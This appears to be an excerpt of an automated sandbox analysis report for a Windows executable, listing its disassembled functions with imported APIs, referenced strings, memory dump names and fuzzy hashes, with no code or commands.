Instruction Fuzzy Hash: BA413832A0A781A6EA55AF51E94453AB3B1FF44F40FA85135CA4D43354EF3DEE41C760

Function 00007FF7865E1450 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865E2050: memset.VCRUNTIME140(?,?,?,00007FF7865E1489), ref: 00007FF7865E213F

memset.VCRUNTIME140 ref: 00007FF7865E18E4

Part of subcall function 00007FF7866010C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7866010F0
Part of subcall function 00007FF7866010C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786601119
Part of subcall function 00007FF7866010C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786601142

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E19C0
memset.VCRUNTIME140 ref: 00007FF7865E1C7C
memset.VCRUNTIME140 ref: 00007FF7865E1CAC

Strings

##Overlay, xrefs: 00007FF7865E1B99

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memset$free$malloc
String ID: ##Overlay
API String ID: 1393892039-3248624929
Opcode ID: 8b74354f79ebfd0c27580578c7ca65284e41158dec7fbec98600206e05b7cbbd
Instruction ID: 7f9f26ed1d2cd9bd6f1e81ece560911ce9d840e9f2c09354632755c38399fbb3
Opcode Fuzzy Hash: 8b74354f79ebfd0c27580578c7ca65284e41158dec7fbec98600206e05b7cbbd
Instruction Fuzzy Hash: D322F332505BC189D310DF39E8441D977A9F745F68FAC433AEAA40B398DF34A4A1CB68

Function 00007FF7865F3950 Relevance: 7.6, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F398B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F39CF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3A0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3A30
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3A55
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3A7E

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
Instruction ID: 176b65bc2bb060e9508895a45cd9756604468330049f4563d500c57d2559587a
Opcode Fuzzy Hash: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
Instruction Fuzzy Hash: 13314A32B0A681A5FE94AF52E94067AA3A1FF84F40FA85535CD4E43364DF2CED44CB60

Function 00007FF786629540 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF78662957B
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF78662959A
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7866295CC
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7866295E7
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786629633

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID:
API String ID: 1830095303-0
Opcode ID: 1dad840c7d6ef9d326f5b0ea2094c75c2581b1eafbf6e81cf013dbac125aaab4
Instruction ID: 2eb8d4fbf8e26e358c5a07e8eb486fbfca29253c1ce4862aa00c7e8f0ed3fee6
Opcode Fuzzy Hash: 1dad840c7d6ef9d326f5b0ea2094c75c2581b1eafbf6e81cf013dbac125aaab4
Instruction Fuzzy Hash: 7D317E32705B8191EB10DF26EA9472AB7A1FB45B89F548131CA4D43724CF39C86ACB40

Function 00007FF7866287D0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF786628803
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF786628822
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF786628854
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF78662886F

Part of subcall function 00007FF786629D40: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF786629D7A
Part of subcall function 00007FF786629D40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629D97
Part of subcall function 00007FF786629D40: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786629DC0
Part of subcall function 00007FF786629D40: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF786629E0B
Part of subcall function 00007FF786629D40: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF786629E20

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7866288BB

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
String ID:
API String ID: 2682282330-0
Opcode ID: 5c3eb3089c8e71072f5338f0a692fa3475058fbc56085c1773b47f7c1a0f9e87
Instruction ID: baf0ae56f04c809645f879ee0adaf145f16a83ac10854ee42df448642107f522
Opcode Fuzzy Hash: 5c3eb3089c8e71072f5338f0a692fa3475058fbc56085c1773b47f7c1a0f9e87
Instruction Fuzzy Hash: EE215A32708B8292EB10DF25F95472AB7A5FB49B88F948135DA8D47768CF3DD409CB50

Function 00007FF786612530 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78662A090: DeviceIoControl.KERNEL32 ref: 00007FF78662A149

Part of subcall function 00007FF78662A190: DeviceIoControl.KERNEL32 ref: 00007FF78662A249

DeviceIoControl.KERNEL32 ref: 00007FF78661262E
DeviceIoControl.KERNEL32 ref: 00007FF7866126B0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612769

Strings

NPC, xrefs: 00007FF78661278B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
String ID: NPC
API String ID: 2054765191-3492492454
Opcode ID: 1939a8b3d1a67aeb4469f3c21e14df6e84af20d113f364385093492c89facb07
Instruction ID: 2644628dadf6b6b8ba6f0e5d432fc1707380f694eeff5df4385a114d854291df
Opcode Fuzzy Hash: 1939a8b3d1a67aeb4469f3c21e14df6e84af20d113f364385093492c89facb07
Instruction Fuzzy Hash: 0061F272B05781AAEB00DF65E8403AE73A2FB44798F908635DE5D03B98DF38D955CB50

Function 00007FF78661A3E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF78661A4CA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661A505

Strings

Press Key, xrefs: 00007FF78661A46F
Select Key, xrefs: 00007FF78661A43A

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: CreateThread_invalid_parameter_noinfo_noreturn
String ID: Press Key$Select Key
API String ID: 2430190256-2074042277
Opcode ID: 38718c631a5cfa3e00e0affdcc8444de94284896ddde2a5a0e55baae332bcc17
Instruction ID: ab75fa0be815df84ea059bca0a046efa67f9220dd61da060d0caa384b3c039b6
Opcode Fuzzy Hash: 38718c631a5cfa3e00e0affdcc8444de94284896ddde2a5a0e55baae332bcc17
Instruction Fuzzy Hash: E931EAA1F186C151EB50AB14E84537BE712FB817A4FA05235EA5D066D9DF2CD884CF10

Function 00007FF7865F2E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF7865F2E49
ImmSetCompositionWindow.IMM32 ref: 00007FF7865F2E6F
ImmReleaseContext.IMM32 ref: 00007FF7865F2E7B

Strings

, xrefs: 00007FF7865F2E67

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Context$CompositionReleaseWindow
String ID:
API String ID: 244372355-3916222277
Opcode ID: f6c38229c954742a0d5ac76e88cef7d873b25a87dc9533906f47dd598e62fb52
Instruction ID: bab8e45ec4471bdc6be66b8ff90c20b72cc25880c03083b781082e3935044cbf
Opcode Fuzzy Hash: f6c38229c954742a0d5ac76e88cef7d873b25a87dc9533906f47dd598e62fb52
Instruction Fuzzy Hash: C9015E75B09B8192EA60AF16F945266B3A1BB8CB94FA80135DE8C47714EF3CD844CB50

Function 00007FF78662F274 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF78662F2A9
__current_exception_context.VCRUNTIME140 ref: 00007FF78662F2BD
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662F2C5

Strings

csm, xrefs: 00007FF78662F295

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
Instruction ID: 7da222a270c2d187784390606386253c317b170f7d4339b787aec1a8e2ba5c22
Opcode Fuzzy Hash: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
Instruction Fuzzy Hash: C7F04477605B80CAC310AF62EC800AD3366F789B88B9A5131FA4D47B59CF38C890CB21

Function 00007FF7865EB87E Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 474COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF7865EC12E
#CLOSE, xrefs: 00007FF7865EBCFC
#COLLAPSE, xrefs: 00007FF7865EBC95

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: freemallocmemcpy
String ID: %.*s$#CLOSE$#COLLAPSE
API String ID: 3056473165-830562872
Opcode ID: 681f3d780f0ef6974c41a4a31700af1003b88c4f32cfd03c12d26a70ca9d8da7
Instruction ID: bff4a2e7d6cfc49f06651ffbfd49054501f2bd4b79da86e2370e6a766fcec3ff
Opcode Fuzzy Hash: 681f3d780f0ef6974c41a4a31700af1003b88c4f32cfd03c12d26a70ca9d8da7
Instruction Fuzzy Hash: 7E32D536B086C5ABEB09DB36CA402E9B3A1FF59344F548735DB2857291DB38F860CB10

Function 00007FF7865F2210 Relevance: 6.3, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F2292
memcpy.VCRUNTIME140 ref: 00007FF7865F22B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F22D8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F235C
memcpy.VCRUNTIME140 ref: 00007FF7865F236C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: mallocmemcpy$free
String ID:
API String ID: 798594229-0
Opcode ID: bc8a45b6411aaf55af11a5d79b17b838c4c1552f80796056bca3cf68135ad035
Instruction ID: 992cfc0600276b9c64a6be375f377fd77dd57b0cc7e90e44c9a4208c796ec492
Opcode Fuzzy Hash: bc8a45b6411aaf55af11a5d79b17b838c4c1552f80796056bca3cf68135ad035
Instruction Fuzzy Hash: A141D6726097C286EB40DF65E9411B9B3A1FB84B94F685236DE4D87789DF3CD841C720

Function 00007FF78660DEF0 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E066
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E084
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E3AB
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660E40D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 57aea55b4c2260e0483cf07a78bd6de75e042f1f93d924f17514c3f8d6bf104d
Instruction ID: 127ca0815d074983d8138f60296f4350c210ab1fdf6c3d0e50cecd54e97bd5d1
Opcode Fuzzy Hash: 57aea55b4c2260e0483cf07a78bd6de75e042f1f93d924f17514c3f8d6bf104d
Instruction Fuzzy Hash: F2E12732F086D995E213B737A8421BAF391BF6E384F688732ED4876161DF297C91C911

Function 00007FF78660F7B0 Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F936
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660F953
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660FBC0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660FC0E

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 5d9c23052e32490d5e9f1eff749d4997c8176e569aae3ab7ab84b95663f41b9b
Instruction ID: 380b52bf11a38494fab5519960e00140194639ec3ea93b98006423c02756fdb7
Opcode Fuzzy Hash: 5d9c23052e32490d5e9f1eff749d4997c8176e569aae3ab7ab84b95663f41b9b
Instruction Fuzzy Hash: 9BE1F522E08ACD95E253B63758421FAE351BF6E384F698B32ED48311B5DB397981CE11

Function 00007FF78660FD90 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660FF29
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78660FF40
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661018B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7866101E4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 913ee08830a84e6ace97ef18f8c4bee6a5c7b69069a0cf085aeb0279c4cb7da6
Instruction ID: 9cf87d1cc4f9aa422233dab0b2cdc57a898991c3541f8fc26da4c389aac94895
Opcode Fuzzy Hash: 913ee08830a84e6ace97ef18f8c4bee6a5c7b69069a0cf085aeb0279c4cb7da6
Instruction Fuzzy Hash: BBE10822E0CAC955E663B63658022F7F351BF6F385F688732ED48751B2DF293981CA10

Function 00007FF7865E47C0 Relevance: 6.3, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E47E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E480C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E4831
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E4856
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E487B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
Instruction ID: 1320c4351d89ed306d9ba380a546bf8fa5f93d0b0b9c4f6a027d3f05cd723436
Opcode Fuzzy Hash: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
Instruction Fuzzy Hash: 5A114435B0A6C2A5FE59AB90DC1073AA2A0FF45F41FA89135C80D97260DF2CA805CBA0

Function 00007FF786606060 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF7866064A0

Strings

%*s%.*s, xrefs: 00007FF7866064F1
%.*s, xrefs: 00007FF7866064CC
--------------------------------, xrefs: 00007FF78660640E

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memchr
String ID: %*s%.*s$ %.*s$--------------------------------
API String ID: 3297308162-2326682469
